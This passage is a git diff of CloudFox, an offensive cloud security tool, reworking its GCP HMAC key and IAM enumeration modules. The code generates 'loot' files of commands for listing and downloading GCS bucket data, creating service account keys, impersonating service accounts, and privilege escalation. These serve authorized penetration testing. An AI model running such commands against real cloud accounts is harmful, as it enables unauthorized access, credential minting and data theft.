"hmac-s3-commands", - Contents: "# S3-Compatible Access Commands for GCS\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", - } - m.LootMap["hmac-all-access-ids"] = &internal.LootFile{ - Name: "hmac-all-access-ids", - Contents: "", - } -} - -func (m *HMACKeysModule) addKeyToLoot(key hmacservice.HMACKeyInfo) { - // All access IDs - m.LootMap["hmac-all-access-ids"].Contents += key.AccessID + "\n" - - if key.IsActive { - // Active keys loot - m.LootMap["hmac-active-keys"].Contents += fmt.Sprintf( - "# Access ID: %s\n"+ - "# Service Account: %s\n"+ - "# Project: %s\n"+ - "# Created: %s\n"+ - "# Risk: %s\n", - key.AccessID, - key.ServiceAccountEmail, - key.ProjectID, - key.TimeCreated.Format(time.RFC3339), - key.RiskLevel, - ) - if len(key.RiskReasons) > 0 { - m.LootMap["hmac-active-keys"].Contents += "# Risk Reasons:\n" - for _, reason := range key.RiskReasons { - m.LootMap["hmac-active-keys"].Contents += fmt.Sprintf("# - %s\n", reason) - } - } - m.LootMap["hmac-active-keys"].Contents += "\n" - - // S3 commands loot - m.LootMap["hmac-s3-commands"].Contents += fmt.Sprintf( - "## HMAC Key: %s\n"+ - "## Service Account: %s\n"+ - "## Project: %s\n\n"+ - "# Step 1: Configure AWS CLI with HMAC credentials\n"+ - "# You need the secret key which must be obtained at creation time\n"+ - "# If you have iam.serviceAccountKeys.create permission, create a new key:\n"+ - "# gcloud storage hmac create %s --project=%s\n\n"+ - "# Step 2: Use with AWS CLI (after configuration)\n"+ - "aws configure set aws_access_key_id %s\n"+ - "aws configure set aws_secret_access_key \n\n"+ - "# Step 3: List buckets via S3-compatible endpoint\n"+ - "aws --endpoint-url https://storage.googleapis.com s3 ls\n\n"+ - "# Step 4: Access specific bucket\n"+ - "aws --endpoint-url https://storage.googleapis.com s3 ls s3://\n\n"+ - "# Step 5: Download files\n"+ - "aws --endpoint-url https://storage.googleapis.com s3 cp s3:/// .\n\n", - key.AccessID, - key.ServiceAccountEmail, - key.ProjectID, - key.ServiceAccountEmail, - key.ProjectID, - key.AccessID, - ) - } -} - -func (m *HMACKeysModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Main HMAC keys table - header := []string{ - "Access ID", - "Service Account", - "State", - "Created", - "Age (Days)", - "Risk", - "Project Name", - "Project", - } - - var body [][]string - for _, key := range m.HMACKeys { - age := "-" - if !key.TimeCreated.IsZero() { - ageDays := int(time.Since(key.TimeCreated).Hours() / 24) - age = fmt.Sprintf("%d", ageDays) - } - - body = append(body, []string{ - key.AccessID, - key.ServiceAccountEmail, - key.State, - key.TimeCreated.Format("2006-01-02"), - age, - key.RiskLevel, - m.GetProjectName(key.ProjectID), - key.ProjectID, - }) - } - - // Active keys table - activeHeader := []string{ - "Access ID", - "Service Account", - "Created", - "Risk", - "Risk Reasons", - "Project Name", - "Project", - } - - var activeBody [][]string - for _, key := range m.HMACKeys { - if key.IsActive { - activeBody = append(activeBody, []string{ - key.AccessID, - key.ServiceAccountEmail, - key.TimeCreated.Format("2006-01-02"), - key.RiskLevel, - strings.Join(key.RiskReasons, "; "), - m.GetProjectName(key.ProjectID), - key.ProjectID, - }) - } - } - - // Collect loot files - var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { - lootFiles = append(lootFiles, *loot) - } - } - - tables := []internal.TableFile{ - { - Name: "hmackeys", - Header: header, - Body: body, - }, - } - - if len(activeBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "hmackeys-active", - Header: activeHeader, - Body: activeBody, - }) - logger.InfoM(fmt.Sprintf("[PENTEST] Found %d active HMAC key(s) for S3-compatible access", len(activeBody)), globals.GCP_HMACKEYS_MODULE_NAME) - } - - output := HMACKeysOutput{Table: tables, Loot: lootFiles} - - scopeNames := make([]string, len(m.ProjectIDs)) - for i, id := range m.ProjectIDs { - scopeNames[i] = m.GetProjectName(id) - } - - err := internal.HandleOutputSmart( - "gcp", - m.Format, - m.OutputDirectory, - m.Verbosity, - m.WrapTable, - "project", - scopeNames, - m.ProjectIDs, - m.Account, - output, - ) - if err != nil { - logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_HMACKEYS_MODULE_NAME) - } -} diff --git a/gcp/commands/iam.go b/gcp/commands/iam.go index 197eacbb..3d8d8bc6 100644 --- a/gcp/commands/iam.go +++ b/gcp/commands/iam.go @@ -7,26 +7,27 @@ import ( "sync" IAMService "github.com/BishopFox/cloudfox/gcp/services/iamService" - gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/spf13/cobra" ) var GCPIAMCommand = &cobra.Command{ Use: globals.GCP_IAM_MODULE_NAME, - Aliases: []string{"roles", "permissions"}, - Short: "Enumerate GCP IAM principals, service accounts, groups, and custom roles", - Long: `Enumerate GCP IAM principals and their role bindings with security-focused analysis. + Aliases: []string{"roles"}, + Short: "Enumerate GCP IAM principals across organizations, folders, and projects", + Long: `Enumerate GCP IAM principals and their role bindings across the entire hierarchy. Features: -- Lists all IAM principals (users, service accounts, groups, domains) -- Shows role assignments per principal with inheritance tracking +- Enumerates IAM bindings at organization, folder, and project levels +- Shows role assignments per principal with scope information - Enumerates service accounts with key information - Lists custom roles with their permissions - Identifies groups and their role assignments - Detects high-privilege roles and public access -- Shows inherited roles from folders and organization +- Shows conditional IAM policies with details +- Attempts to retrieve MFA status for users (requires Admin SDK) - Generates gcloud commands for privilege escalation testing`, Run: runGCPIAMCommand, } @@ -45,10 +46,10 @@ var highPrivilegeRoles = map[string]bool{ "roles/iam.workloadIdentityUser": true, "roles/iam.roleAdmin": true, // Resource Manager roles - "roles/resourcemanager.projectIamAdmin": true, - "roles/resourcemanager.folderAdmin": true, - "roles/resourcemanager.folderIamAdmin": true, - "roles/resourcemanager.organizationAdmin": true, + "roles/resourcemanager.projectIamAdmin": true, + "roles/resourcemanager.folderAdmin": true, + "roles/resourcemanager.folderIamAdmin": true, + "roles/resourcemanager.organizationAdmin": true, // Compute roles "roles/compute.admin": true, "roles/compute.instanceAdmin": true, @@ -56,10 +57,10 @@ var highPrivilegeRoles = map[string]bool{ // Storage roles "roles/storage.admin": true, // Functions/Run roles - "roles/cloudfunctions.admin": true, + "roles/cloudfunctions.admin": true, "roles/cloudfunctions.developer": true, - "roles/run.admin": true, - "roles/run.developer": true, + "roles/run.admin": true, + "roles/run.developer": true, // Secret Manager "roles/secretmanager.admin": true, // Container/Kubernetes @@ -83,13 +84,21 @@ var highPrivilegeRoles = map[string]bool{ type IAMModule struct { gcpinternal.BaseGCPModule - // Module-specific fields - Principals []IAMService.PrincipalWithRoles + // Module-specific fields - using enhanced data + ScopeBindings []IAMService.ScopeBinding ServiceAccounts []IAMService.ServiceAccountInfo CustomRoles []IAMService.CustomRole Groups []IAMService.GroupInfo + MFAStatus map[string]*IAMService.MFAStatus LootMap map[string]*internal.LootFile mu sync.Mutex + + // Member to groups mapping (email -> list of group emails) + MemberToGroups map[string][]string + + // Organization info for output path + OrgIDs []string + OrgNames map[string]string } // ------------------------------ @@ -116,11 +125,15 @@ func runGCPIAMCommand(cmd *cobra.Command, args []string) { // Create module instance module := &IAMModule{ BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - Principals: []IAMService.PrincipalWithRoles{}, + ScopeBindings: []IAMService.ScopeBinding{}, ServiceAccounts: []IAMService.ServiceAccountInfo{}, CustomRoles: []IAMService.CustomRole{}, Groups: []IAMService.GroupInfo{}, + MFAStatus: make(map[string]*IAMService.MFAStatus), LootMap: make(map[string]*internal.LootFile), + MemberToGroups: make(map[string][]string), + OrgIDs: []string{}, + OrgNames: make(map[string]string), } // Initialize loot files @@ -134,266 +147,149 @@ func runGCPIAMCommand(cmd *cobra.Command, args []string) { // Module Execution // ------------------------------ func (m *IAMModule) Execute(ctx context.Context, logger internal.Logger) { - // Run enumeration with concurrency - m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_IAM_MODULE_NAME, m.processProject) - - // Check results - if len(m.Principals) == 0 { - logger.InfoM("No IAM principals found", globals.GCP_IAM_MODULE_NAME) - return - } - - logger.SuccessM(fmt.Sprintf("Found %d principal(s), %d service account(s), %d custom role(s), %d group(s)", - len(m.Principals), len(m.ServiceAccounts), len(m.CustomRoles), len(m.Groups)), globals.GCP_IAM_MODULE_NAME) - - // Write output - m.writeOutput(ctx, logger) -} - -// ------------------------------ -// Project Processor (called concurrently for each project) -// ------------------------------ -func (m *IAMModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.InfoM(fmt.Sprintf("Enumerating IAM in project: %s", projectID), globals.GCP_IAM_MODULE_NAME) - } + logger.InfoM("Enumerating IAM across organizations, folders, and projects...", globals.GCP_IAM_MODULE_NAME) - // Create service and fetch combined IAM data + // Use the enhanced IAM enumeration iamService := IAMService.New() - iamData, err := iamService.CombinedIAM(projectID) + iamData, err := iamService.CombinedIAMEnhanced(ctx, m.ProjectIDs, m.ProjectNames) if err != nil { m.CommandCounter.Error++ - gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, - fmt.Sprintf("Could not enumerate IAM in project %s", projectID)) + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, "Failed to enumerate IAM") return } - // Thread-safe append - m.mu.Lock() - m.Principals = append(m.Principals, iamData.Principals...) - m.ServiceAccounts = append(m.ServiceAccounts, iamData.ServiceAccounts...) - m.CustomRoles = append(m.CustomRoles, iamData.CustomRoles...) - m.Groups = append(m.Groups, iamData.Groups...) + m.ScopeBindings = iamData.ScopeBindings + m.ServiceAccounts = iamData.ServiceAccounts + m.CustomRoles = iamData.CustomRoles + m.Groups = iamData.Groups + m.MFAStatus = iamData.MFAStatus - // Generate loot for each principal - for _, principal := range iamData.Principals { - m.addPrincipalToLoot(principal, projectID) - } + // Try to enumerate group memberships to build reverse lookup + enrichedGroups := iamService.GetGroupMemberships(ctx, m.Groups) + m.Groups = enrichedGroups - // Generate loot for service accounts - for _, sa := range iamData.ServiceAccounts { - m.addServiceAccountToLoot(sa, projectID) + // Build member-to-groups reverse mapping + for _, group := range enrichedGroups { + if group.MembershipEnumerated { + for _, member := range group.Members { + if member.Email != "" { + m.MemberToGroups[member.Email] = append(m.MemberToGroups[member.Email], group.Email) + } + } + } } - // Generate loot for custom roles - for _, role := range iamData.CustomRoles { - m.addCustomRoleToLoot(role) + // Generate loot + m.generateLoot() + + // Count scopes and track org IDs + orgCount, folderCount, projectCount := 0, 0, 0 + scopeSeen := make(map[string]bool) + for _, sb := range m.ScopeBindings { + key := sb.ScopeType + ":" + sb.ScopeID + if !scopeSeen[key] { + scopeSeen[key] = true + switch sb.ScopeType { + case "organization": + orgCount++ + m.OrgIDs = append(m.OrgIDs, sb.ScopeID) + m.OrgNames[sb.ScopeID] = sb.ScopeName + case "folder": + folderCount++ + case "project": + projectCount++ + } + } } - m.mu.Unlock() - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.InfoM(fmt.Sprintf("Found %d principal(s), %d SA(s), %d custom role(s), %d group(s) in project %s", - len(iamData.Principals), len(iamData.ServiceAccounts), len(iamData.CustomRoles), len(iamData.Groups), projectID), globals.GCP_IAM_MODULE_NAME) - } + logger.SuccessM(fmt.Sprintf("Found %d binding(s) across %d org(s), %d folder(s), %d project(s); %d SA(s), %d custom role(s), %d group(s)", + len(m.ScopeBindings), orgCount, folderCount, projectCount, + len(m.ServiceAccounts), len(m.CustomRoles), len(m.Groups)), globals.GCP_IAM_MODULE_NAME) + + // Write output + m.writeOutput(ctx, logger) } // ------------------------------ // Loot File Management // ------------------------------ func (m *IAMModule) initializeLootFiles() { - m.LootMap["iam-gcloud-commands"] = &internal.LootFile{ - Name: "iam-gcloud-commands", - Contents: "# GCP IAM Enumeration Commands\n# Generated by CloudFox\n\n", - } - m.LootMap["iam-high-privilege"] = &internal.LootFile{ - Name: "iam-high-privilege", - Contents: "# GCP High-Privilege Principals\n# Generated by CloudFox\n# These principals have elevated permissions\n\n", - } - m.LootMap["iam-service-accounts"] = &internal.LootFile{ - Name: "iam-service-accounts", - Contents: "# GCP Service Account Exploitation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", - } - m.LootMap["iam-privilege-escalation"] = &internal.LootFile{ - Name: "iam-privilege-escalation", - Contents: "# GCP Privilege Escalation Paths\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", - } - m.LootMap["iam-custom-roles"] = &internal.LootFile{ - Name: "iam-custom-roles", - Contents: "# GCP Custom Roles\n# Generated by CloudFox\n# Review these for overly permissive custom roles\n\n", - } - m.LootMap["iam-service-account-keys"] = &internal.LootFile{ - Name: "iam-service-account-keys", - Contents: "# GCP Service Account Keys\n# Generated by CloudFox\n# User-managed keys are potential security risks\n\n", - } - m.LootMap["iam-groups"] = &internal.LootFile{ - Name: "iam-groups", - Contents: "# GCP Groups with IAM Permissions\n# Generated by CloudFox\n# Consider reviewing group membership for high-privilege roles\n\n", - } - m.LootMap["iam-inherited-roles"] = &internal.LootFile{ - Name: "iam-inherited-roles", - Contents: "# GCP Inherited IAM Roles\n# Generated by CloudFox\n# These roles are inherited from folders or organization\n\n", + m.LootMap["iam-commands"] = &internal.LootFile{ + Name: "iam-commands", + Contents: "# GCP IAM Commands\n# Generated by CloudFox\n\n", } } -func (m *IAMModule) addPrincipalToLoot(principal IAMService.PrincipalWithRoles, projectID string) { - hasHighPrivilege := false - var highPrivRoles []string - var inheritedRoles []string +func (m *IAMModule) generateLoot() { + // Track unique service accounts we've seen + sasSeen := make(map[string]bool) - for _, binding := range principal.PolicyBindings { - if highPrivilegeRoles[binding.Role] { - hasHighPrivilege = true - highPrivRoles = append(highPrivRoles, binding.Role) + for _, sb := range m.ScopeBindings { + if sb.MemberType != "ServiceAccount" { + continue } - if binding.IsInherited { - inheritedRoles = append(inheritedRoles, fmt.Sprintf("%s (from %s)", binding.Role, binding.InheritedFrom)) + if sasSeen[sb.MemberEmail] { + continue } - } + sasSeen[sb.MemberEmail] = true - // Track inherited roles - if len(inheritedRoles) > 0 { - m.LootMap["iam-inherited-roles"].Contents += fmt.Sprintf( - "# Principal: %s (Type: %s)\n"+ - "# Inherited Roles:\n", - principal.Name, principal.Type, - ) - for _, role := range inheritedRoles { - m.LootMap["iam-inherited-roles"].Contents += fmt.Sprintf(" - %s\n", role) - } - m.LootMap["iam-inherited-roles"].Contents += "\n" - } + // Check for high privilege roles + isHighPriv := highPrivilegeRoles[sb.Role] - // Track groups - if principal.Type == "Group" { - var roles []string - for _, binding := range principal.PolicyBindings { - roles = append(roles, binding.Role) + if isHighPriv { + m.LootMap["iam-commands"].Contents += fmt.Sprintf( + "# Service Account: %s [HIGH PRIVILEGE] (%s)\n", + sb.MemberEmail, sb.Role, + ) + } else { + m.LootMap["iam-commands"].Contents += fmt.Sprintf( + "# Service Account: %s\n", + sb.MemberEmail, + ) } - hasHighPriv := "" - if hasHighPrivilege { - hasHighPriv = " [HIGH PRIVILEGE]" + + // Use project scope if available, otherwise use first project + projectID := sb.ScopeID + if sb.ScopeType != "project" && len(m.ProjectIDs) > 0 { + projectID = m.ProjectIDs[0] } - m.LootMap["iam-groups"].Contents += fmt.Sprintf( - "# Group: %s%s\n"+ - "# Project: %s\n"+ - "# Roles: %s\n"+ - "# Enumerate group membership (requires Admin SDK):\n"+ - "# gcloud identity groups memberships list --group-email=%s\n\n", - principal.Email, hasHighPriv, - projectID, - strings.Join(roles, ", "), - principal.Email, - ) - } - // gcloud commands for enumeration - if principal.Type == "ServiceAccount" { - saEmail := strings.TrimPrefix(principal.Name, "serviceAccount:") - m.LootMap["iam-gcloud-commands"].Contents += fmt.Sprintf( - "# Service Account: %s\n"+ - "gcloud iam service-accounts describe %s --project=%s\n"+ + m.LootMap["iam-commands"].Contents += fmt.Sprintf( + "gcloud iam service-accounts describe %s --project=%s\n"+ "gcloud iam service-accounts keys list --iam-account=%s --project=%s\n"+ - "gcloud iam service-accounts get-iam-policy %s --project=%s\n\n", - saEmail, - saEmail, projectID, - saEmail, projectID, - saEmail, projectID, - ) - - // Service account exploitation commands - m.LootMap["iam-service-accounts"].Contents += fmt.Sprintf( - "# Service Account: %s\n"+ - "# Create a key for this service account:\n"+ + "gcloud iam service-accounts get-iam-policy %s --project=%s\n"+ "gcloud iam service-accounts keys create ./key.json --iam-account=%s --project=%s\n"+ - "# Generate access token:\n"+ - "gcloud auth print-access-token --impersonate-service-account=%s\n"+ - "# Generate ID token:\n"+ - "gcloud auth print-identity-token --impersonate-service-account=%s\n\n", - saEmail, - saEmail, projectID, - saEmail, - saEmail, + "gcloud auth print-access-token --impersonate-service-account=%s\n\n", + sb.MemberEmail, projectID, + sb.MemberEmail, projectID, + sb.MemberEmail, projectID, + sb.MemberEmail, projectID, + sb.MemberEmail, ) } - // High privilege principals - if hasHighPrivilege { - m.LootMap["iam-high-privilege"].Contents += fmt.Sprintf( - "# Principal: %s (Type: %s)\n"+ - "# High-Privilege Roles: %s\n"+ - "# Resource: %s/%s\n", - principal.Name, principal.Type, - strings.Join(highPrivRoles, ", "), - principal.ResourceType, principal.ResourceID, - ) - if principal.HasCustomRoles { - m.LootMap["iam-high-privilege"].Contents += fmt.Sprintf( - "# Custom Roles: %s\n", strings.Join(principal.CustomRoles, ", ")) - } - m.LootMap["iam-high-privilege"].Contents += "\n" - - // Privilege escalation paths - if principal.Type == "ServiceAccount" { - saEmail := strings.TrimPrefix(principal.Name, "serviceAccount:") - m.LootMap["iam-privilege-escalation"].Contents += fmt.Sprintf( - "# Service Account: %s has high privileges\n"+ - "# Roles: %s\n"+ - "# Potential privilege escalation via service account key creation:\n"+ - "gcloud iam service-accounts keys create ./key.json --iam-account=%s\n"+ - "# Then authenticate:\n"+ - "gcloud auth activate-service-account %s --key-file=./key.json\n\n", - saEmail, - strings.Join(highPrivRoles, ", "), - saEmail, - saEmail, + // Add service accounts with keys + for _, sa := range m.ServiceAccounts { + if sa.HasKeys { + m.LootMap["iam-commands"].Contents += fmt.Sprintf( + "# Service Account with Keys: %s (Keys: %d)\n"+ + "gcloud iam service-accounts keys list --iam-account=%s --project=%s\n\n", + sa.Email, sa.KeyCount, sa.Email, sa.ProjectID, ) } } -} -// addServiceAccountToLoot adds detailed service account info to loot -func (m *IAMModule) addServiceAccountToLoot(sa IAMService.ServiceAccountInfo, projectID string) { - // Service accounts with user-managed keys - if sa.HasKeys { - m.LootMap["iam-service-account-keys"].Contents += fmt.Sprintf( - "# Service Account: %s\n"+ - "# Project: %s\n"+ - "# User-Managed Keys: %d\n"+ - "# Disabled: %v\n"+ - "# List keys:\n"+ - "gcloud iam service-accounts keys list --iam-account=%s --project=%s\n\n", - sa.Email, - projectID, - sa.KeyCount, - sa.Disabled, - sa.Email, projectID, + // Add custom roles + for _, role := range m.CustomRoles { + m.LootMap["iam-commands"].Contents += fmt.Sprintf( + "# Custom Role: %s (%d permissions)\n"+ + "gcloud iam roles describe %s --project=%s\n\n", + role.Title, role.PermissionCount, + extractRoleName(role.Name), role.ProjectID, ) } } -// addCustomRoleToLoot adds custom role info to loot -func (m *IAMModule) addCustomRoleToLoot(role IAMService.CustomRole) { - deletedStr := "" - if role.Deleted { - deletedStr = " [DELETED]" - } - m.LootMap["iam-custom-roles"].Contents += fmt.Sprintf( - "# Role: %s%s\n"+ - "# Title: %s\n"+ - "# Stage: %s\n"+ - "# Permissions: %d\n"+ - "# Description: %s\n"+ - "# View role details:\n"+ - "gcloud iam roles describe %s --project=%s\n\n", - role.Name, deletedStr, - role.Title, - role.Stage, - role.PermissionCount, - role.Description, - extractRoleName(role.Name), role.ProjectID, - ) -} - // extractRoleName extracts the role name from full path func extractRoleName(fullName string) string { parts := strings.Split(fullName, "/") @@ -403,213 +299,315 @@ func extractRoleName(fullName string) string { return fullName } -// truncateString truncates a string to maxLen characters -func truncateString(s string, maxLen int) string { - if len(s) <= maxLen { - return s +// FederatedIdentityInfo contains parsed information about a federated identity +type FederatedIdentityInfo struct { + IsFederated bool + ProviderType string // AWS, GitHub, GitLab, OIDC, SAML, Azure, etc. + PoolName string + Subject string + Attribute string +} + +// parseFederatedIdentity detects and parses federated identity principals +// Federated identities use principal:// or principalSet:// format +func parseFederatedIdentity(identity string) FederatedIdentityInfo { + info := FederatedIdentityInfo{} + + // Check for principal:// or principalSet:// format + if !strings.HasPrefix(identity, "principal://") && !strings.HasPrefix(identity, "principalSet://") { + return info + } + + info.IsFederated = true + + // Parse the principal URL + // Format: principal://iam.googleapis.com/projects/{project}/locations/global/workloadIdentityPools/{pool}/subject/{subject} + // Or: principalSet://iam.googleapis.com/projects/{project}/locations/global/workloadIdentityPools/{pool}/attribute.{attr}/{value} + + // Extract pool name if present + if strings.Contains(identity, "workloadIdentityPools/") { + parts := strings.Split(identity, "workloadIdentityPools/") + if len(parts) > 1 { + poolParts := strings.Split(parts[1], "/") + if len(poolParts) > 0 { + info.PoolName = poolParts[0] + } + } + } + + // Detect provider type based on common patterns in pool names and attributes + identityLower := strings.ToLower(identity) + + switch { + case strings.Contains(identityLower, "aws") || strings.Contains(identityLower, "amazon"): + info.ProviderType = "AWS" + case strings.Contains(identityLower, "github"): + info.ProviderType = "GitHub" + case strings.Contains(identityLower, "gitlab"): + info.ProviderType = "GitLab" + case strings.Contains(identityLower, "azure") || strings.Contains(identityLower, "microsoft"): + info.ProviderType = "Azure" + case strings.Contains(identityLower, "okta"): + info.ProviderType = "Okta" + case strings.Contains(identityLower, "bitbucket"): + info.ProviderType = "Bitbucket" + case strings.Contains(identityLower, "circleci"): + info.ProviderType = "CircleCI" + case strings.Contains(identity, "attribute."): + // Has OIDC attributes but unknown provider + info.ProviderType = "OIDC" + case strings.Contains(identity, "/subject/"): + // Has subject but unknown provider type + info.ProviderType = "Federated" + default: + info.ProviderType = "Federated" + } + + // Extract subject if present + if strings.Contains(identity, "/subject/") { + parts := strings.Split(identity, "/subject/") + if len(parts) > 1 { + info.Subject = parts[1] + } + } + + // Extract attribute and value if present + // Format: .../attribute.{attr}/{value} + if strings.Contains(identity, "/attribute.") { + parts := strings.Split(identity, "/attribute.") + if len(parts) > 1 { + attrParts := strings.Split(parts[1], "/") + if len(attrParts) >= 1 { + info.Attribute = attrParts[0] + } + if len(attrParts) >= 2 { + // The value is the specific identity (e.g., repo name) + info.Subject = attrParts[1] + } + } + } + + return info +} + +// formatFederatedInfo formats federated identity info for display +func formatFederatedInfo(info FederatedIdentityInfo) string { + if !info.IsFederated { + return "-" + } + + result := info.ProviderType + + // Show subject (specific identity like repo/workflow) if available + if info.Subject != "" { + result += ": " + info.Subject + } else if info.Attribute != "" { + result += " [" + info.Attribute + "]" + } + + // Add pool name in parentheses + if info.PoolName != "" { + result += " (pool: " + info.PoolName + ")" + } + + return result +} + +// formatCondition formats a condition for display +func formatCondition(condInfo *IAMService.IAMCondition) string { + if condInfo == nil { + return "No" + } + + // Build a meaningful condition summary + parts := []string{} + + if condInfo.Title != "" { + parts = append(parts, condInfo.Title) } - return s[:maxLen-3] + "..." + + // Parse common condition patterns from expression + expr := condInfo.Expression + if expr != "" { + // Check for time-based conditions + if strings.Contains(expr, "request.time") { + if strings.Contains(expr, "timestamp") { + parts = append(parts, "[time-limited]") + } + } + // Check for resource-based conditions + if strings.Contains(expr, "resource.name") { + parts = append(parts, "[resource-scoped]") + } + // Check for IP-based conditions + if strings.Contains(expr, "origin.ip") || strings.Contains(expr, "request.origin") { + parts = append(parts, "[IP-restricted]") + } + // Check for device policy + if strings.Contains(expr, "device") { + parts = append(parts, "[device-policy]") + } + } + + if len(parts) == 0 { + return "Yes" + } + + return strings.Join(parts, " ") } // ------------------------------ // Output Generation // ------------------------------ func (m *IAMModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Main principals table with security columns - principalHeader := []string{ - "Principal", - "Type", + // New table structure with Scope Type/ID/Name + header := []string{ + "Scope Type", + "Scope ID", + "Scope Name", + "Entry Type", + "Identity", "Role", - "High Priv", + "High Privilege", "Custom Role", - "Inherited", + "Has Keys", "Condition", - "Source", - "Project Name", - "Project", + "MFA", + "Groups", + "Federated", } - var principalBody [][]string + var body [][]string publicAccessFound := false - conditionsFound := false - for _, principal := range m.Principals { - for _, binding := range principal.PolicyBindings { - isHighPriv := "" - if highPrivilegeRoles[binding.Role] { - isHighPriv = "YES" - } + saWithKeys := 0 + highPrivCount := 0 + + // Add scope bindings (one row per binding) + for _, sb := range m.ScopeBindings { + isHighPriv := "No" + if highPrivilegeRoles[sb.Role] { + isHighPriv = "Yes" + highPrivCount++ + } - isCustom := "" - if strings.HasPrefix(binding.Role, "projects/") || strings.HasPrefix(binding.Role, "organizations/") { - isCustom = "✓" - } + isCustom := "No" + if sb.IsCustom { + isCustom = "Yes" + } - inherited := "" - source := binding.ResourceType - if binding.IsInherited { - inherited = "✓" - source = binding.InheritedFrom - } + // Format condition + condition := "No" + if sb.HasCondition { + condition = formatCondition(sb.ConditionInfo) + } + + // Check for public access + if sb.MemberType == "PUBLIC" || sb.MemberType == "ALL_AUTHENTICATED" { + publicAccessFound = true + } - // Check for conditions (conditional access) - condition := "" - if binding.HasCondition { - conditionsFound = true - if binding.ConditionInfo != nil && binding.ConditionInfo.Title != "" { - condition = binding.ConditionInfo.Title + // Get MFA status + mfa := "-" + if sb.MemberType == "User" { + if status, ok := m.MFAStatus[sb.MemberEmail]; ok { + if status.Error != "" { + mfa = "Unknown" + } else if status.HasMFA { + mfa = "Yes" } else { - condition = "✓" + mfa = "No" } } + } else if sb.MemberType == "ServiceAccount" { + mfa = "N/A" + } - // Check for public access - if principal.Type == "PUBLIC" || principal.Type == "ALL_AUTHENTICATED" { - publicAccessFound = true - } - - principalBody = append(principalBody, []string{ - principal.Email, - principal.Type, - binding.Role, - isHighPriv, - isCustom, - inherited, - condition, - source, - m.GetProjectName(binding.ResourceID), - binding.ResourceID, - }) + // Get groups this member belongs to + groups := "-" + if memberGroups, ok := m.MemberToGroups[sb.MemberEmail]; ok && len(memberGroups) > 0 { + groups = strings.Join(memberGroups, ", ") } - } - // Service accounts table - saHeader := []string{ - "Email", - "Display Name", - "Disabled", - "Has Keys", - "Key Count", - "Project Name", - "Project", + // Check for federated identity + federated := formatFederatedInfo(parseFederatedIdentity(sb.MemberEmail)) + + body = append(body, []string{ + sb.ScopeType, + sb.ScopeID, + sb.ScopeName, + sb.MemberType, + sb.MemberEmail, + sb.Role, + isHighPriv, + isCustom, + "-", + condition, + mfa, + groups, + federated, + }) } - var saBody [][]string - saWithKeys := 0 + // Add service accounts for _, sa := range m.ServiceAccounts { + hasKeys := "No" + if sa.HasKeys { + hasKeys = "Yes" + saWithKeys++ + } + disabled := "" if sa.Disabled { - disabled = "✓" + disabled = " (disabled)" } - hasKeys := "" - if sa.HasKeys { - hasKeys = "YES" - saWithKeys++ + + // Get groups this SA belongs to + groups := "-" + if memberGroups, ok := m.MemberToGroups[sa.Email]; ok && len(memberGroups) > 0 { + groups = strings.Join(memberGroups, ", ") } - saBody = append(saBody, []string{ - sa.Email, + body = append(body, []string{ + "project", + sa.ProjectID, + m.GetProjectName(sa.ProjectID), + "ServiceAccountInfo", + sa.Email + disabled, sa.DisplayName, - disabled, + "-", + "-", hasKeys, - fmt.Sprintf("%d", sa.KeyCount), - m.GetProjectName(sa.ProjectID), - sa.ProjectID, + "-", + "N/A", + groups, + "-", // Service accounts are not federated identities }) } - // Custom roles table - customRoleHeader := []string{ - "Role Name", - "Title", - "Stage", - "Permissions", - "Deleted", - "Project Name", - "Project", - } - - var customRoleBody [][]string + // Add custom roles for _, role := range m.CustomRoles { deleted := "" if role.Deleted { - deleted = "✓" + deleted = " (deleted)" } - customRoleBody = append(customRoleBody, []string{ - extractRoleName(role.Name), - role.Title, - role.Stage, - fmt.Sprintf("%d", role.PermissionCount), - deleted, - m.GetProjectName(role.ProjectID), + body = append(body, []string{ + "project", role.ProjectID, + m.GetProjectName(role.ProjectID), + "CustomRole", + extractRoleName(role.Name) + deleted, + fmt.Sprintf("%s (%d permissions)", role.Title, role.PermissionCount), + "-", + "Yes", + "-", + "-", + "-", + "-", + "-", // Custom roles are not federated identities }) } - // Groups table - groupHeader := []string{ - "Group Email", - "Role Count", - "High Privilege", - "Project Name", - "Project", - } - - var groupBody [][]string - for _, group := range m.Groups { - hasHighPriv := "" - for _, role := range group.Roles { - if highPrivilegeRoles[role] { - hasHighPriv = "YES" - break - } - } - - groupBody = append(groupBody, []string{ - group.Email, - fmt.Sprintf("%d", len(group.Roles)), - hasHighPriv, - m.GetProjectName(group.ProjectID), - group.ProjectID, - }) - } - - // High privilege principals table - highPrivHeader := []string{ - "Principal", - "Type", - "High Priv Roles", - "Custom Roles", - "Project Name", - "Project", - } - - var highPrivBody [][]string - highPrivSet := make(map[string]bool) - for _, principal := range m.Principals { - var highPrivRoles []string - for _, binding := range principal.PolicyBindings { - if highPrivilegeRoles[binding.Role] { - highPrivRoles = append(highPrivRoles, binding.Role) - } - } - if len(highPrivRoles) > 0 && !highPrivSet[principal.Name] { - highPrivSet[principal.Name] = true - customRolesStr := "" - if principal.HasCustomRoles { - customRolesStr = strings.Join(principal.CustomRoles, ", ") - } - highPrivBody = append(highPrivBody, []string{ - principal.Email, - principal.Type, - strings.Join(highPrivRoles, ", "), - customRolesStr, - m.GetProjectName(principal.ResourceID), - principal.ResourceID, - }) - } - } - // Collect loot files var lootFiles []internal.LootFile for _, loot := range m.LootMap { @@ -621,86 